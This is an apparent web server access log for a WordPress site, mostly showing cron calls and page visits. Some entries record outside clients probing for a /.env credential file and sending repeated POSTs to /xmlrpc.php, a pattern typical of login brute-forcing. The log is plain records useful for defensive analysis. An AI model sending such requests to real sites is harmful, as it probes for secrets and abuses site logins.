36.133.115.36 - - [04/Sep/2025:15:54:58 +0800] "POST /wp-cron.php?doing_wp_cron=1756972498.3261198997497558593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.92.124 - - [04/Sep/2025:15:54:58 +0800] "GET /.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
196.251.92.124 - - [04/Sep/2025:15:55:00 +0800] "POST / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
36.133.115.36 - - [04/Sep/2025:15:57:34 +0800] "POST /wp-cron.php?doing_wp_cron=1756972654.3812749385833740234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.240.19.150 - - [04/Sep/2025:15:57:34 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:16:01:16 +0800] "POST /wp-cron.php?doing_wp_cron=1756972876.0856399536132812500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.167.236.228 - - [04/Sep/2025:16:01:16 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.167.236.228 - - [04/Sep/2025:16:01:17 +0800] "GET / HTTP/1.1" 200 33466 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Sep/2025:16:07:58 +0800] "POST /wp-cron.php?doing_wp_cron=1756973278.7949140071868896484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
212.32.238.6 - - [04/Sep/2025:16:07:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:16:23:59 +0800] "POST /wp-cron.php?doing_wp_cron=1756974239.4211969375610351562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [04/Sep/2025:16:23:59 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
42.236.17.23 - - [04/Sep/2025:16:25:29 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [04/Sep/2025:16:30:44 +0800] "POST /wp-cron.php?doing_wp_cron=1756974644.0668020248413085937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
212.32.238.6 - - [04/Sep/2025:16:30:44 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:16:42:12 +0800] "POST /wp-cron.php?doing_wp_cron=1756975332.0656950473785400390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.249.144.86 - - [04/Sep/2025:16:42:12 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:16:43:57 +0800] "POST /wp-cron.php?doing_wp_cron=1756975437.2074339389801025390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [04/Sep/2025:16:43:57 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
